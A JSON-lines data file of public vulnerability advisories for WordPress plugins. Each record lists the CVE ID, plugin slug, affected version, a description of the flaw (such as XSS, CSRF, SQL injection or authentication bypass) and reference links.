{"CVE_ID":"CVE-2023-1340","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the clear_uucss_logs function. This makes it possible for unauthenticated attackers to clear plugin logs via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/488e26e2-d4d7-4036-a672-53c2d4c9d39b\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/488e26e2-d4d7-4036-a672-53c2d4c9d39b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0542","slug":"custom-post-type-list-shortcode","versionImpact":"1.4.4","description":"The Custom Post Type List Shortcode WordPress plugin through 1.4.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17de2f77-3e6c-4c22-9196-6e5577ee7fcf\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17de2f77-3e6c-4c22-9196-6e5577ee7fcf\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3211","slug":"wp-database-admin","versionImpact":"1.0.3","description":"The WordPress Database Administrator WordPress plugin through 1.0.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/873824f0-e8b1-45bd-8579-bc3c649a54e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/873824f0-e8b1-45bd-8579-bc3c649a54e5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1777","slug":"admin-side-data-storage-for-contact-form-7","versionImpact":"1.1.1","description":"The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the settings update function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b411a97b-2f1c-4feb-b1c7-bc5a1aab7f33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b411a97b-2f1c-4feb-b1c7-bc5a1aab7f33?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/inc\\\/settings.php#L301\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/inc\\\/settings.php#L301\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3674","slug":"inline-google-spreadsheet-viewer","versionImpact":"0.13.2","description":"The Inline Google Spreadsheet Viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gdoc' shortcode in all versions up to, and including, 0.13.2 due to insufficient input sanitization and output escaping on user supplied attributes such as 'chart_resolution'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/523e80a5-dffa-4eb6-8f7a-e179e0dc4d28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/523e80a5-dffa-4eb6-8f7a-e179e0dc4d28?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inline-google-spreadsheet-viewer\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inline-google-spreadsheet-viewer\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3630","slug":"hl-twitter","versionImpact":"2014.1.18","description":"The HL Twitter WordPress plugin through 2014.1.18 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbab7639-fdb2-4ee5-b5ca-9e30701a63b7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbab7639-fdb2-4ee5-b5ca-9e30701a63b7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2381","slug":"ali2woo-lite","versionImpact":"3.3.5","description":"The AliExpress Dropshipping with AliNext Lite plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ajax_save_image function in all versions up to, and including, 3.3.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3248327-6e10-420e-83cf-a23296eb2e6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3248327-6e10-420e-83cf-a23296eb2e6f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ali2woo-lite\\\/trunk\\\/\\\/includes\\\/classes\\\/controller\\\/WooCommerceProductEditController.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ali2woo-lite\\\/trunk\\\/\\\/includes\\\/classes\\\/controller\\\/WooCommerceProductEditController.php#L108\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7302","slug":"blog2social","versionImpact":"7.5.4","description":"The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 3gp2 file uploads in all versions up to, and including, 7.5.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the 3gp2 file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94afe3e2-a1f1-470b-afaf-c7926beaec9a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94afe3e2-a1f1-470b-afaf-c7926beaec9a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog2social\\\/tags\\\/7.5.4\\\/includes\\\/Ajax\\\/Post.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog2social\\\/tags\\\/7.5.4\\\/includes\\\/Ajax\\\/Post.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blog2social\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blog2social\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128861\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128861\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128861\\\/#file434\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128861\\\/#file434\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11973","slug":"quran-text-multilanguage","versionImpact":"2.3.21","description":"The Quran multilanguage Text & Audio plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'sourate' and 'lang' parameter in all versions up to, and including, 2.3.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203456\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203456\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quran-text-multilanguage\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quran-text-multilanguage\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09afbbd2-52c6-48a6-a2f0-b1509d864e7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09afbbd2-52c6-48a6-a2f0-b1509d864e7e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12496","slug":"linear","versionImpact":"2.7.12","description":"The Linear plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'linear_block_buy_commissions' shortcode in all versions up to, and including, 2.7.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linear\\\/trunk\\\/blocks\\\/buy-commissions\\\/buy-commissions.php#L213\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linear\\\/trunk\\\/blocks\\\/buy-commissions\\\/buy-commissions.php#L213\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/linear\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/linear\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25d6ee47-2a7b-486e-856b-336964b387ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25d6ee47-2a7b-486e-856b-336964b387ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23492","slug":"taobaoke","versionImpact":"1.1.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CantonBolo WordPress ????? allows Reflected XSS. This issue affects WordPress ?????: from n\/a through 1.1.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/taobaoke\\\/vulnerability\\\/wordpress-plugin-1-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/taobaoke\\\/vulnerability\\\/wordpress-plugin-1-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1717","slug":"login-me-now","versionImpact":"1.7.2","description":"The Login Me Now plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.7.2. This is due to insecure authentication based on an arbitrary transient name in the 'AutoLogin::listen()' function. This makes it possible for unauthenticated attackers to log in an existing user on the site, even an administrator. Note: this vulnerability requires using a transient name and value from other software, so the plugin is not inherently vulnerable on its own.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-me-now\\\/tags\\\/1.7.2\\\/app\\\/Logins\\\/BrowserTokenLogin\\\/AutoLogin.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-me-now\\\/tags\\\/1.7.2\\\/app\\\/Logins\\\/BrowserTokenLogin\\\/AutoLogin.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc689622-50d6-47c4-a5f6-0314b1a207c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc689622-50d6-47c4-a5f6-0314b1a207c9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3844","slug":"peprodev-ups","versionImpact":"7.5.2","description":"The PeproDev Ultimate Profile Solutions plugin for WordPress is vulnerable to Authentication Bypass in versions 1.9.1 to 7.5.2. This is due to the handel_ajax_req() function not having proper restrictions on the change_user_meta functionality, which makes it possible to set an OTP code and subsequently log in with that OTP code. This makes it possible for unauthenticated attackers to log in as other users on the site, including administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L1483\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L1483\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L2836\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peprodev-ups\\\/tags\\\/7.5.2\\\/login\\\/login.php#L2836\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65be9417-7029-4f34-b834-98208a42743b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65be9417-7029-4f34-b834-98208a42743b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5291","slug":"master-slider","versionImpact":"3.10.8","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's masterslider_pb and ms_slide shortcodes in all versions up to, and including, 3.10.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L633\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L633\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L763\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L763\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L783\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.10.8\\\/includes\\\/msp-shortcodes.php#L783\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309620\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309620\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/#description\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce37fbd2-8d41-4feb-adf6-7ca0ca54e27a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce37fbd2-8d41-4feb-adf6-7ca0ca54e27a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1339","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check on the uucss_update_rule function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to update caching rules.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19f126f8-1d59-44b5-8e0e-c37f1fbedf5a\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19f126f8-1d59-44b5-8e0e-c37f1fbedf5a\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0537","slug":"product-slider-for-woocommerce-lite","versionImpact":"1.1.7","description":"The Product Slider For WooCommerce Lite WordPress plugin through 1.1.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7369f1d-d1a0-4576-a676-c70525a6c743\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7369f1d-d1a0-4576-a676-c70525a6c743\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36728","slug":"angwp","versionImpact":"1.5.5","description":"The Adning Advertising plugin for WordPress is vulnerable to file deletion via path traversal in versions up to, and including, 1.5.5. This allows unauthenticated attackers to delete arbitrary files which can be used to reset and gain full control of a site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/07\\\/critical-vulnerabilities-patched-in-adning-advertising-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/07\\\/critical-vulnerabilities-patched-in-adning-advertising-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-pro-advertising-system-all-in-one-ad-manager\\\/269693\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-pro-advertising-system-all-in-one-ad-manager\\\/269693\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-adning-advertising-plugin-actively-exploited-in-the-wild\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-adning-advertising-plugin-actively-exploited-in-the-wild\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7506429-7f8a-45b5-b1b0-6fdb39599ee5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7506429-7f8a-45b5-b1b0-6fdb39599ee5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4893","slug":"crayon-syntax-highlighter","versionImpact":"2.8.4","description":"The Crayon Syntax Highlighter plugin for WordPress is vulnerable to Server Side Request Forgery via the 'crayon' shortcode in versions up to, and including, 2.8.4. This can allow authenticated attackers with contributor-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/527f75f1-6361-4e16-8ae4-d38ca4589811?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/527f75f1-6361-4e16-8ae4-d38ca4589811?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crayon-syntax-highlighter\\\/trunk\\\/crayon_highlighter.class.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crayon-syntax-highlighter\\\/trunk\\\/crayon_highlighter.class.php#L83\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49168","slug":"bp-better-messages","versionImpact":"2.4.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WordPlus Better Messages \u2013 Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss allows Stored XSS. This issue affects Better Messages \u2013 Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss: from n\/a through 2.4.0.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bp-better-messages\\\/wordpress-bp-better-messages-plugin-2-3-12-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bp-better-messages\\\/wordpress-bp-better-messages-plugin-2-3-12-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1776","slug":"admin-side-data-storage-for-contact-form-7","versionImpact":"1.1.1","description":"The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to SQL Injection via the 'form-id' parameter in all versions up to, and including, 1.1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bff8172-b879-40b0-a229-a54787baa38a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bff8172-b879-40b0-a229-a54787baa38a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/inc\\\/settings.php#L301\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/inc\\\/settings.php#L301\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3629","slug":"hl-twitter","versionImpact":"2014.1.18","description":"The HL Twitter WordPress plugin through 2014.1.18 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1f6ed2c-0f84-4b13-b39e-5cb91443c2b1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1f6ed2c-0f84-4b13-b39e-5cb91443c2b1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5664","slug":"mp3-music-player-by-sonaar","versionImpact":"5.5","description":"The MP3 Audio Player \u2013 Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' attribute within the plugin's sonaar_audioplayer shortcode in all versions up to, and including, 5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c14783d3-68de-49c6-9c54-eb7fc4a7bf94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c14783d3-68de-49c6-9c54-eb7fc4a7bf94?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/tags\\\/5.4.0.2\\\/includes\\\/class-sonaar-music-widget.php#L1853\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mp3-music-player-by-sonaar\\\/tags\\\/5.4.0.2\\\/includes\\\/class-sonaar-music-widget.php#L1853\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115110\\\/mp3-music-player-by-sonaar\\\/trunk\\\/includes\\\/class-sonaar-music-widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115110\\\/mp3-music-player-by-sonaar\\\/trunk\\\/includes\\\/class-sonaar-music-widget.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mp3-music-player-by-sonaar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mp3-music-player-by-sonaar\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8547","slug":"simple-popup-plugin","versionImpact":"4.5","description":"The Simple Popup Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [popup] shortcode in all versions up to, and including, 4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/217da4de-38df-41ff-b138-f12d4f8999cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/217da4de-38df-41ff-b138-f12d4f8999cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-popup-plugin\\\/trunk\\\/simple_popup_plugin.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-popup-plugin\\\/trunk\\\/simple_popup_plugin.php#L87\",\"refsource\":\"\",\"tags\":[]}]"}
